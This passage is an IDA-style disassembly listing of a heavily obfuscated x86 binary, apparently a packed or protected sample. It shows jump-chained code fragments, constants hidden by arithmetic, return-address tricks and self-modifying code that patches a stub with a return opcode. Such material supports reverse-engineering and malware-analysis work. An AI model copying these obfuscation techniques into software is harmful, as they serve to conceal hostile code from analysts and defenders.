add edi, 0E425A616h
mov [edi], eax
push offset loc_42A19A
jmp loc_42C3CC
; END OF FUNCTION CHUNK FOR sub_4251A2
; ---------------------------------------------------------------------------
push 9D2DC323h
jmp loc_42484A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429629
loc_42BA3A: ; CODE XREF: sub_429629-2B3C�j
jnz loc_4274F9
loc_42BA40: ; CODE XREF: _94j21ax3:loc_429729�j
jmp loc_42381B
; END OF FUNCTION CHUNK FOR sub_429629
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425934
loc_42BA45: ; CODE XREF: sub_42B9CF-4A04�j
; sub_425934:loc_429505�j
ja loc_42593D
adc ebx, edx
mov ebp, [eax]
; END OF FUNCTION CHUNK FOR sub_425934
; START OF FUNCTION CHUNK FOR sub_42B9CF
loc_42BA4F: ; CODE XREF: sub_42B9CF:loc_4281B8�j
call sub_42C057
test al, al
jz loc_428D3D
jmp loc_425878
; END OF FUNCTION CHUNK FOR sub_42B9CF
; ---------------------------------------------------------------------------
loc_42BA61: ; CODE XREF: _94j21ax3:loc_429D2B�j
push 49FF4951h
push offset sub_428FFB
jmp locret_4236ED
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4284C0
loc_42BA70: ; CODE XREF: sub_4284C0-74B2�j
and ax, 38FFh
call sub_423717
; END OF FUNCTION CHUNK FOR sub_4284C0
; =============== S U B R O U T I N E =======================================
sub_42BA79 proc near ; CODE XREF: sub_427D53-451E�p
xchg eax, [esp+0]
mov eax, [esp+0]
call sub_423F43
retn
sub_42BA79 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421393
loc_42BA85: ; CODE XREF: sub_421393+10�j
jmp loc_424FBD
; END OF FUNCTION CHUNK FOR sub_421393
; =============== S U B R O U T I N E =======================================
sub_42BA8A proc near ; CODE XREF: sub_423324:loc_422157�p
; sub_4214E6+146A�p ...
var_4 = dword ptr -4
; FUNCTION CHUNK AT 004235A3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00425A77 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00427044 SIZE 0000000E BYTES
jo sub_426C51
push eax
jmp loc_427044
sub_42BA8A endp
; ---------------------------------------------------------------------------
pushf
jl loc_4247E7
jmp sub_42C1AE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423324
loc_42BAA2: ; CODE XREF: sub_423324+60B2�j
call sub_42C5E8
; END OF FUNCTION CHUNK FOR sub_423324
; START OF FUNCTION CHUNK FOR sub_42574E
loc_42BAA7: ; CODE XREF: sub_42574E+2491�j
jmp sub_42C057
; END OF FUNCTION CHUNK FOR sub_42574E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426CF4
loc_42BAAC: ; CODE XREF: sub_426CF4+C�j
jmp loc_422CDB
; END OF FUNCTION CHUNK FOR sub_426CF4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4221B8
loc_42BAB1: ; CODE XREF: sub_4221B8+3880�j
jmp loc_426E03
; END OF FUNCTION CHUNK FOR sub_4221B8
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_25. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42284F
loc_42BAB7: ; CODE XREF: sub_42284F+2F3B�j
jmp loc_4214C0
; END OF FUNCTION CHUNK FOR sub_42284F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_12. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423324
loc_42BABD: ; CODE XREF: sub_423324+3F54�j
jmp loc_42B5CB
; END OF FUNCTION CHUNK FOR sub_423324
; =============== S U B R O U T I N E =======================================
sub_42BAC2 proc near ; CODE XREF: sub_4215F9:loc_42160C�j
; sub_424775-912�p
; FUNCTION CHUNK AT 00425075 SIZE 00000002 BYTES
push eax
call sub_429382
call sub_427CEA
loc_42BACD: ; CODE XREF: sub_4294B3-7BCF�j
not eax
jmp loc_425075
sub_42BAC2 endp
; =============== S U B R O U T I N E =======================================
sub_42BAD4 proc near ; DATA XREF: sub_422F0A+8A05�o
; FUNCTION CHUNK AT 004223A0 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00422512 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00425B27 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 004286AC SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00429722 SIZE 00000007 BYTES
cmp eax, [ebp-8]
jnz loc_4223A0
call sub_426985
loc_42BAE2: ; CODE XREF: _94j21ax3:00428F0B�j
jmp loc_429722
sub_42BAD4 endp
; ---------------------------------------------------------------------------
js loc_42A236
jmp sub_42559A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427ABD
loc_42BAF2: ; CODE XREF: sub_427ABD:loc_42760E�j
jnz loc_423EB6
jmp loc_42B6C1
; END OF FUNCTION CHUNK FOR sub_427ABD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422E7B
loc_42BAFD: ; CODE XREF: sub_422E7B+19�j
push eax
push edx
push 3D5FFC0Ah
mov edx, offset sub_42BB0D
xchg edx, [esp+4+var_4]
retn
; END OF FUNCTION CHUNK FOR sub_422E7B
; =============== S U B R O U T I N E =======================================
sub_42BB0D proc near ; DATA XREF: sub_422E7B+8C89�o
; FUNCTION CHUNK AT 004213C4 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00424084 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042AA2B SIZE 00000005 BYTES
and edx, 0F70C1848h
jmp loc_424084
sub_42BB0D endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422973
loc_42BB18: ; CODE XREF: sub_422973+14�j
push 749C0CA7h
pop eax
xor eax, 749C0DA7h
call sub_42B9E8
mov ds:dword_429F74, eax
jmp loc_4217A2
; END OF FUNCTION CHUNK FOR sub_422973
; ---------------------------------------------------------------------------
loc_42BB33: ; CODE XREF: _94j21ax3:00428B4B�j
xor eax, 0A180D791h
; =============== S U B R O U T I N E =======================================
sub_42BB39 proc near ; CODE XREF: sub_42574E�p
; FUNCTION CHUNK AT 00421056 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 004270EA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004271FD SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00428874 SIZE 0000000D BYTES
xchg ebx, [esp+0]
pop ebx
push ebp
mov ebp, esp
jmp loc_4270EA
sub_42BB39 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42ADA2
loc_42BB45: ; CODE XREF: sub_42ADA2:loc_4278E1�j
jnz loc_42C1E3
jmp loc_425A20
; END OF FUNCTION CHUNK FOR sub_42ADA2
; ---------------------------------------------------------------------------
loc_42BB50: ; DATA XREF: sub_422FC8+5353�o
pop ebx
pop ecx
pop ebp
jmp loc_426485
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429280
loc_42BB58: ; CODE XREF: sub_429280+6�j
or ebx, edx
sbb eax, 1ACC46B8h
and ecx, eax
sub ebx, edx
mov edx, ecx
jmp loc_42AA31
; END OF FUNCTION CHUNK FOR sub_429280
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423FCD
loc_42BB6B: ; CODE XREF: sub_423FCD+520A�j
push 0FCDA7669h
loc_42BB70: ; CODE XREF: sub_423FCD:loc_42B0DB�j
jmp loc_425267
; ---------------------------------------------------------------------------
loc_42BB75: ; CODE XREF: sub_423FCD+9�j
jb loc_42A341
lea eax, [ebp-0Ch]
push eax
push esi
push 0E49A94F9h
jmp loc_42A3C9
; END OF FUNCTION CHUNK FOR sub_423FCD
; =============== S U B R O U T I N E =======================================
sub_42BB8A proc near ; CODE XREF: _94j21ax3:00423238�j
; sub_422790:loc_42864B�p
mov [esp+0], ecx
pop ecx
cmp dword ptr [eax-0Ch], 4
jnz loc_42BBA1
add dword ptr [ebp-8], 4
jmp loc_428B82
; ---------------------------------------------------------------------------
loc_42BBA1: ; CODE XREF: sub_42BB8A+8�j
push offset loc_42C547
jmp nullsub_175
sub_42BB8A endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C0BC
loc_42BBAB: ; CODE XREF: sub_42C0BC-7822�j
mov eax, [eax]
test eax, 1
jz loc_42C36D
jmp loc_427B09
; END OF FUNCTION CHUNK FOR sub_42C0BC
; ---------------------------------------------------------------------------
loc_42BBBD: ; DATA XREF: sub_428090+1E�o
mov eax, ds:dword_42199C
or eax, eax
jnz loc_424CCD
jmp loc_42432B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423A56
loc_42BBD0: ; CODE XREF: sub_423A56+5403�j
shl edi, 0Ch
test ebp, 1A31345Ah
jmp loc_4274DB
; END OF FUNCTION CHUNK FOR sub_423A56
; ---------------------------------------------------------------------------
loc_42BBDE: ; CODE XREF: _94j21ax3:loc_42A263�j
jnz loc_4224C5
jmp loc_424D26
; ---------------------------------------------------------------------------
loc_42BBE9: ; CODE XREF: _94j21ax3:loc_427FA7�j
push ebp
jmp loc_42BF26
; ---------------------------------------------------------------------------
loc_42BBEF: ; CODE XREF: _94j21ax3:00421747�j
push offset loc_422F3F
jmp locret_4257ED
; =============== S U B R O U T I N E =======================================
sub_42BBF9 proc near ; CODE XREF: _94j21ax3:00423C70�j
; sub_424DE8:loc_424649�p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0042810E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428E05 SIZE 00000015 BYTES
xchg ebx, [esp+4+var_4]
pop ebx
call sub_42574E
mov edx, 0F2B89A19h
jmp loc_428E05
sub_42BBF9 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421689
loc_42BC0C: ; CODE XREF: sub_421689+4DDE�j
or ebx, 0F45C29D0h
jmp loc_421D04
; END OF FUNCTION CHUNK FOR sub_421689
; =============== S U B R O U T I N E =======================================
sub_42BC17 proc near ; CODE XREF: sub_421689+75FE�j
var_10 = dword ptr -10h
; FUNCTION CHUNK AT 00423A66 SIZE 00000005 BYTES
add esp, 0FFFFFFF0h
call sub_421013
loc_42BC1F: ; CODE XREF: sub_42284F+5369�j
push 3077B2EFh
pop eax
xor eax, 404D47ADh
add eax, 9007AEA0h
xchg eax, [esp+10h+var_10]
jmp loc_423A66
sub_42BC17 endp
; =============== S U B R O U T I N E =======================================
sub_42BC39 proc near ; DATA XREF: sub_423324+7A�o
; FUNCTION CHUNK AT 00425460 SIZE 0000000B BYTES
test eax, eax
jle loc_423E68
jmp loc_425460
sub_42BC39 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AEB2
loc_42BC46: ; CODE XREF: sub_42AEB2+11�j
push offset sub_424CA9
jmp loc_42C343
; END OF FUNCTION CHUNK FOR sub_42AEB2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42191F
loc_42BC50: ; CODE XREF: sub_42191F+64AD�j
push eax
call sub_42AA5F
push eax
push 0ADB5F99Bh
jmp loc_42AF7F
; END OF FUNCTION CHUNK FOR sub_42191F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426626
loc_42BC61: ; CODE XREF: sub_426626:loc_428443�j
call sub_42A709
pop ecx
loc_42BC67: ; CODE XREF: _94j21ax3:0042AC7B�j
mov [ebp-20h], eax
jmp loc_4288E4
; ---------------------------------------------------------------------------
loc_42BC6F: ; CODE XREF: sub_426626:loc_428FC8�j
test byte ptr [ebp-8], 40h
jz loc_4288E4
jmp loc_42B80E
; END OF FUNCTION CHUNK FOR sub_426626
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422EB0
loc_42BC7E: ; CODE XREF: sub_422EB0:loc_428E48�j
; sub_422EB0+6B05�j ...
jo loc_42892D
cmp dword ptr [ebp-4], 4
jnz loc_4272F8
jmp loc_42AA21
; END OF FUNCTION CHUNK FOR sub_422EB0
; =============== S U B R O U T I N E =======================================
sub_42BC93 proc near ; CODE XREF: sub_42AC2D-919D�p
; _94j21ax3:0042499E�j
mov [esp+0], ebx
pop ebx
jz loc_424940
mov eax, [eax]
jmp loc_425994
sub_42BC93 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AC2D
loc_42BCA4: ; CODE XREF: sub_42AC2D:loc_42AC48�j
or eax, eax
call sub_42A919
; END OF FUNCTION CHUNK FOR sub_42AC2D
; START OF FUNCTION CHUNK FOR sub_421F28
loc_42BCAB: ; CODE XREF: sub_421F28+510D�j
jmp loc_42ADB1
; END OF FUNCTION CHUNK FOR sub_421F28
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42982D
loc_42BCB0: ; CODE XREF: sub_42982D:loc_42978D�j
add ecx, esi
ror esi, 0Ah
test esi, 628842F5h
jmp loc_42323D
; END OF FUNCTION CHUNK FOR sub_42982D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423614
loc_42BCC0: ; CODE XREF: sub_423614-BB2�j
rol eax, 19h
and eax, 4024D9E9h
add eax, 22868Bh
call sub_423614
loc_42BCD4: ; CODE XREF: sub_423517:loc_42B81D�j
pop edi
add edi, 684A89AEh
xchg edi, [esp-4+arg_0]
jmp nullsub_5
; END OF FUNCTION CHUNK FOR sub_423614
; ---------------------------------------------------------------------------
and edx, 1226496Dh
jmp loc_427716
; ---------------------------------------------------------------------------
loc_42BCEE: ; DATA XREF: sub_42A61F+7�o
mov ebp, esp
push ecx
mov esp, ebp
xchg esi, [esp]
mov ebp, esi
jmp loc_422665
; ---------------------------------------------------------------------------
loc_42BCFD: ; CODE XREF: _94j21ax3:00421CE9�j
; _94j21ax3:loc_42B4B6�j
jno loc_422138
; =============== S U B R O U T I N E =======================================
sub_42BD03 proc near ; CODE XREF: sub_421013+6CE�p
; FUNCTION CHUNK AT 004215E5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004222A4 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00422481 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00423201 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00429CBF SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042B3BF SIZE 0000000B BYTES
xchg eax, [esp+0]
pop eax
cmp dword ptr [ebp-4], 0
jz loc_424955
jmp loc_4215E5
sub_42BD03 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42BD16 proc near ; DATA XREF: _94j21ax3:0042694C�o
add edi, ebp
push eax
push 3461ABE1h
pop eax
xor eax, 0FCC69B0h
jmp loc_428A9E
sub_42BD16 endp
; ---------------------------------------------------------------------------
locret_42BD2A: ; CODE XREF: _94j21ax3:0042577F�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42284F
loc_42BD2B: ; CODE XREF: sub_42284F+2493�j
jmp loc_42ADF8
; END OF FUNCTION CHUNK FOR sub_42284F
; =============== S U B R O U T I N E =======================================
sub_42BD30 proc near ; DATA XREF: sub_42A0CC-6C5B�o
; FUNCTION CHUNK AT 0042382D SIZE 00000005 BYTES
push 8631EE58h
pop ecx
push offset loc_42729E
jmp loc_42382D
sub_42BD30 endp
; ---------------------------------------------------------------------------
dword_42BD40 dd 8B3CC083h, 0FC450300h, 0E918C083h, 0FFFFA68Ch
; DATA XREF: sub_42982D+10AD�o
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C1AE
loc_42BD50: ; CODE XREF: sub_42C1AE-730F�j
not eax
jmp loc_42C422
; END OF FUNCTION CHUNK FOR sub_42C1AE
; ---------------------------------------------------------------------------
loc_42BD57: ; DATA XREF: sub_4290B2:loc_42310A�o
mov eax, ds:dword_429F8C
or eax, eax
jnz loc_42A375
call sub_42574E
push 32E7974h
jmp loc_4234FB
; ---------------------------------------------------------------------------
loc_42BD74: ; CODE XREF: _94j21ax3:loc_42367E�j
jnz loc_425743
mov eax, [ebp-4]
mov [ebp-0Ch], eax
shl dword ptr [ebp-8], 8
jmp loc_427E88
; ---------------------------------------------------------------------------
locret_42BD89: ; CODE XREF: _94j21ax3:0042563D�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422538
loc_42BD8A: ; CODE XREF: sub_422538+19�j
jmp loc_42A5D2
; END OF FUNCTION CHUNK FOR sub_422538
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422EB0
loc_42BD8F: ; CODE XREF: sub_422EB0+9268�j
push edx
push eax
mov eax, [ebp-18h]
add eax, eax
loc_42BD96: ; CODE XREF: sub_4295ED+5�j
cdq
jmp loc_428F82
; END OF FUNCTION CHUNK FOR sub_422EB0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A254
loc_42BD9C: ; CODE XREF: sub_42A254:loc_424543�j
; sub_42A254-268D�j
call sub_42574E
mov edx, 0C90D1845h
push ecx
push 745BBEC7h
pop ecx
and ecx, 0B266F7DDh
jmp loc_4286EF
; END OF FUNCTION CHUNK FOR sub_42A254
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428BBD
loc_42BDB8: ; CODE XREF: sub_428BBD-393E�j
jl loc_4235F6
shl ebx, 8
jmp loc_428234
; END OF FUNCTION CHUNK FOR sub_428BBD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42315D
loc_42BDC6: ; CODE XREF: sub_42315D+5892�j
mov eax, [eax]
or eax, eax
jnz loc_421E14
jmp loc_42901D
; END OF FUNCTION CHUNK FOR sub_42315D
; ---------------------------------------------------------------------------
loc_42BDD5: ; CODE XREF: _94j21ax3:0042B55B�j
xor edi, edx
; =============== S U B R O U T I N E =======================================
sub_42BDD7 proc near ; CODE XREF: sub_42851E-41D9�p
arg_4 = dword ptr 8
xchg eax, [esp+0]
pop eax
popf
xchg ecx, [esp-8+arg_4]
call sub_42541E
push offset sub_42A81A
jmp nullsub_176
sub_42BDD7 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_42BDEE: ; CODE XREF: _94j21ax3:loc_42AFE9�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429EDB
loc_42BDEF: ; CODE XREF: sub_429EDB+C�j
jmp loc_42A654
; END OF FUNCTION CHUNK FOR sub_429EDB
; =============== S U B R O U T I N E =======================================
sub_42BDF4 proc near ; CODE XREF: _94j21ax3:00421836�j
; sub_421D33+A828�p
; FUNCTION CHUNK AT 00424F82 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00425762 SIZE 0000000A BYTES
xchg edi, [esp+0]
pop edi
mov eax, [ebp-20h]
call sub_425539
jmp loc_425762
sub_42BDF4 endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_187. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428B5E
loc_42BE06: ; CODE XREF: sub_428B5E-491A�j
pushf
push 1E26D282h
pop ebx
sub ebx, 98802EAh
jmp loc_424916
; END OF FUNCTION CHUNK FOR sub_428B5E
; ---------------------------------------------------------------------------
mov edx, 92B16BD7h
call sub_4239A5
call sub_42574E
push 0A800C06Fh
pop edx
jmp loc_4293FB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427CAC
loc_42BE32: ; CODE XREF: sub_427CAC+2893�j
xor eax, esi
add eax, edi
add al, ah
and eax, 7
mov [ebp-4], eax
jmp loc_4294BD
; END OF FUNCTION CHUNK FOR sub_427CAC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424C37
loc_42BE43: ; CODE XREF: sub_424C37:loc_4258DB�j
lea eax, [ebp-24h]
jmp loc_4228B4
; END OF FUNCTION CHUNK FOR sub_424C37
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428381
loc_42BE4B: ; CODE XREF: sub_428381+A�j
lea eax, nullsub_4
mov byte ptr [eax], 0C3h
call nullsub_9
call sub_4265C2
call nullsub_5
mov dword ptr [ebp-4], 1
mov eax, 0
or eax, eax
jmp loc_425313
; END OF FUNCTION CHUNK FOR sub_428381
; ---------------------------------------------------------------------------
test al, al
jz loc_4238A6
call sub_427B35
retn
; =============== S U B R O U T I N E =======================================
sub_42BE84 proc near ; CODE XREF: sub_422973+72AF�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0042C218 SIZE 00000005 BYTES
mov [esp+0], esi
pop esi
loc_42BE88: ; CODE XREF: _94j21ax3:loc_4278F4�j
add edx, 224F5AD4h
xchg edx, [esp-4+arg_0]
jmp loc_42C218
sub_42BE84 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423324
loc_42BE96: ; CODE XREF: sub_423324+6EBC�j
jg loc_42206B
popf
jmp loc_42B272
; END OF FUNCTION CHUNK FOR sub_423324
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425301
loc_42BEA2: ; CODE XREF: sub_425301+5F32�j
push offset sub_42960D
jmp nullsub_212
; END OF FUNCTION CHUNK FOR sub_425301
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42284F
loc_42BEAC: ; CODE XREF: sub_42284F+4CA3�j
shr ebp, 12h
jmp loc_423762
; END OF FUNCTION CHUNK FOR sub_42284F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4294B3
loc_42BEB4: ; CODE XREF: sub_4294B3-6480�j
js loc_4241B1
js loc_424382
jz loc_423941
loc_42BEC6: ; CODE XREF: sub_423324-F3A�j
; sub_423324:loc_4243B4�j ...
jb loc_42A94C
push offset sub_42A268
jmp loc_42A9FD
; END OF FUNCTION CHUNK FOR sub_4294B3
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_42BED6 proc near ; CODE XREF: sub_426B87+B�j
retn
sub_42BED6 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42541E
loc_42BED7: ; CODE XREF: sub_42541E+6�j
jmp sub_42C5CD
; END OF FUNCTION CHUNK FOR sub_42541E
; =============== S U B R O U T I N E =======================================
sub_42BEDC proc near ; CODE XREF: _94j21ax3:00423C7B�j
; sub_422538+4CF5�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00421370 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00425A4A SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00427B04 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004286BC SIZE 0000000A BYTES
mov [esp+0], ecx
pop ecx
xchg ecx, [esp-4+arg_0]
push 0A34B8BCCh
pop edi
sub edi, 0E34002C9h
add edi, 0C9FCA654h
jmp loc_427B04
sub_42BEDC endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42BEFA proc near ; CODE XREF: _94j21ax3:00429C01�j
; sub_42426B+62E3�p
xchg eax, [esp+0]
pop eax
add eax, 82907F8Dh
loc_42BF04: ; CODE XREF: sub_421822:loc_423ED1�j
call sub_42270C
locret_42BF09: ; CODE XREF: sub_4294B3-5126�j
retn
sub_42BEFA endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421246
loc_42BF0A: ; CODE XREF: sub_421246+3�j
jmp loc_424DBF
; END OF FUNCTION CHUNK FOR sub_421246
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A4DC
loc_42BF0F: ; CODE XREF: sub_42A4DC+13�j
pop ebx
retn
; END OF FUNCTION CHUNK FOR sub_42A4DC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BF31
loc_42BF11: ; CODE XREF: sub_42BF31+F�j
jmp loc_4293AB
; END OF FUNCTION CHUNK FOR sub_42BF31
; ---------------------------------------------------------------------------
loc_42BF16: ; CODE XREF: _94j21ax3:004282D1�j
rol eax, 19h
push eax
retn
; =============== S U B R O U T I N E =======================================
sub_42BF1B proc near ; CODE XREF: sub_42B358+8�p
; FUNCTION CHUNK AT 004224FE SIZE 00000014 BYTES
call sub_425168
loc_42BF20: ; CODE XREF: sub_4248E7-2A73�j
jmp loc_4224FE
sub_42BF1B endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_153. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_42BF26: ; CODE XREF: _94j21ax3:0042BBEA�j
cmp ebx, 59876B1Ah
jmp loc_42B4B6
; =============== S U B R O U T I N E =======================================
sub_42BF31 proc near ; CODE XREF: _94j21ax3:0042428E�p
; _94j21ax3:00429591�j
; FUNCTION CHUNK AT 004293AB SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0042BF11 SIZE 00000005 BYTES
mov [esp+0], eax
pop eax
mov edx, 87C4571Ah
push ebx
push 9572EA6Eh
jmp loc_42BF11
sub_42BF31 endp
; ---------------------------------------------------------------------------
lea eax, [ebp-14h]
jmp loc_4285BA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4210AA
loc_42BF4D: ; CODE XREF: sub_4210AA�j
push edi
mov edi, ebp
xchg edi, [esp+4+var_4]
mov ebp, esp
add esp, 0FFFFFFECh
cmp ds:dword_422274, 0
jmp loc_426E0D
; END OF FUNCTION CHUNK FOR sub_4210AA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422EB0
loc_42BF64: ; CODE XREF: sub_422EB0+7F90�j
xchg edi, [edx]
sbb edx, 54AFECE1h
jmp loc_4272F4
; END OF FUNCTION CHUNK FOR sub_422EB0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425934
loc_42BF71: ; CODE XREF: sub_425934+A�j
sub eax, 9AAB6C04h
cmp eax, 0E5858AB7h
jmp loc_429F5E
; END OF FUNCTION CHUNK FOR sub_425934
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B9CF
loc_42BF82: ; CODE XREF: sub_42B9CF:loc_42BFEB�j
shr ebp, 5
jmp loc_42945F
; END OF FUNCTION CHUNK FOR sub_42B9CF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429EDB
loc_42BF8A: ; CODE XREF: _94j21ax3:loc_42114E�j
; sub_429EDB+77F�j
sub edi, ecx
shl edx, 1Ah
jmp loc_426450
; END OF FUNCTION CHUNK FOR sub_429EDB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B03C
loc_42BF94: ; CODE XREF: sub_42B03C+A�j
mov [ebp-1], al
cmp byte ptr [ebp-1], 0
jz loc_427FAC
mov dword ptr [ebp-8], 1
jmp loc_42740E
; END OF FUNCTION CHUNK FOR sub_42B03C
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42BFAD proc near ; CODE XREF: sub_4215F9�j
var_8 = dword ptr -8
var_1 = byte ptr -1
; FUNCTION CHUNK AT 00423BA0 SIZE 00000014 BYTES
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
jmp loc_423BA0
sub_42BFAD endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C5E8
loc_42BFB8: ; CODE XREF: sub_42C5E8:loc_423D03�j
test ebx, 0DDD838Eh
jmp loc_42C08D
; END OF FUNCTION CHUNK FOR sub_42C5E8
; ---------------------------------------------------------------------------
xor ebx, ebp
loc_42BFC5: ; CODE XREF: _94j21ax3:loc_4259D5�j
jmp sub_422E7B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42484C
loc_42BFCA: ; CODE XREF: sub_42AA5F:loc_423CD2�j
; sub_42B856:loc_424986�j ...
mov ecx, [ebp-14h]
and ecx, 7
mov al, 1
shl al, cl
mov edx, [ebp-14h]
loc_42BFD7: ; CODE XREF: sub_42269A:loc_429FE3�j
shr edx, 3
push 66B04C65h
pop ecx
jmp loc_428752
; END OF FUNCTION CHUNK FOR sub_42484C
; =============== S U B R O U T I N E =======================================
sub_42BFE5 proc near ; CODE XREF: sub_423284:loc_4239DF�p
mov eax, 0CCh
retn
sub_42BFE5 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B9CF
loc_42BFEB: ; CODE XREF: sub_42B9CF:loc_42A0E5�j
jmp loc_42BF82
; END OF FUNCTION CHUNK FOR sub_42B9CF
; =============== S U B R O U T I N E =======================================
sub_42BFF0 proc near ; CODE XREF: sub_425975+4�p
; sub_421656+4495�p ...
; FUNCTION CHUNK AT 00427326 SIZE 0000001E BYTES
jno sub_427344
push ebp
mov ebp, esp
push ecx
cmp ds:dword_42C488, 0
jmp loc_427326
sub_42BFF0 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425790
loc_42C006: ; CODE XREF: sub_425790+44B3�j
xchg ebx, [ebp+0]
loc_42C009: ; CODE XREF: sub_425790:loc_422C60�j
call sub_42574E
push 0FADCEE07h
pop edx
sub edx, 0AC3DE205h
add edx, 0CB30BA29h
call sub_4239A5
push eax
jmp loc_42406C
; END OF FUNCTION CHUNK FOR sub_425790
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421822
loc_42C02B: ; CODE XREF: sub_421822+671F�j
cmp eax, edx
jmp loc_423ED1
; END OF FUNCTION CHUNK FOR sub_421822
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C057
loc_42C032: ; CODE XREF: sub_42C057:loc_424834�j
